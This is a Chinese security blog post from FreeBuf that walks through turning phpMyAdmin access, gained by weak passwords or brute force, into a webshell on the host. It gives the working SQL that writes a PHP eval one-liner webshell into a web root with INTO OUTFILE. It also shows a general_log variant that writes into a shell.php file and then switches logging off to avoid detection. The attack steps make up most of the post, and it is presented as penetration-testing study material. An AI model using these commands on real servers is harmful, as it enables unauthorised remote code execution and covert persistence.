freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

phpmyadmin提权:
小呆呀 2023-03-21 21:01:44 170720
所属地 湖南省

0x01条件:

首先得知道phpmyadmin的用户名和密码。可以通过弱口令或者爆破工具拿到用户名和密码

这种方式拿到shell有两种方式。

如果对方服务器的数据库版本低于5.0的时候。我们可以通过outfile直接写入文件

如果对方服务器的数据库版本高于5.0的时候。我们可以尝试通过日志写入文件。当然这种情况需要有文件写入的权限。

0x02步骤:

低于:5.0的情况

Phpmyadmin后台权限到主机权限(getshell)outfille方式

通过弱口令等方式进入后台界面,并找到sql查询界面

1679403423_6419a99faebfc7f331a4c.png!small?1679403422339

查询secure相关配置  show GLOBAL VARIABLES like "secure%";

1679403445_6419a9b56ffa2f8be5caf.png!small?1679403443879

在mysql的目录下找到 my.ini文件 并在[mysqld]配置项加入 secure_file_priv= 保存后并重启数据库

Secure_file_priv参数解释:

  • 当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
  • 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
  • 当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

1679403465_6419a9c9e6b70984d3533.png!small?1679403464914

再次查看secure相关配置 是否正确变更

1679403478_6419a9d61c10b5ab6cf72.png!small?1679403476770

使用命令写入恶意文件 注意斜杠 “\”这是反斜杠要写两个相当于一个 “/”这是斜杠,一个就够了

SELECT "<?php @eval($_POST[pass]); ?>" into outfile "d:\\phpstudy_pro\\www\\bear.php";

1679403495_6419a9e7f0c9757e0b391.png!small?1679403494299

成功写入 验证恶意木马文件

1679403511_6419a9f703e35ab1cd93d.png!small?1679403509437

高于5.0的情况:

注意这些命令都在phpamdin中执行。这里知识方便理解。

Show global variables like "general%";//这里我们查询general_log的配置。为我们之后做好准备

1679403521_6419aa014b3e68a4063cb.png!small?1679403519665

Set global general_log="on";//开启这个功能

Set global general_log_file="D://phpstudy//www//shell.php";

Select "<?php phpinfo(); ?>";//将phpinfo()写入日志

Set global general_log="off";//关闭这个功能,防止被发现。

最后就是去测试了。

# 渗透测试 # 网络安全
本文为 小呆呀 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
漏洞复现
小呆呀 LV.3
愿做网络的守护者
  • 6 文章数
  • 6 关注者
CSV注入漏洞
2023-04-18
upload-labs_通关tips
2023-03-19
Typecho反序列化漏洞(CVE-2018-18753)
2023-03-05
文章目录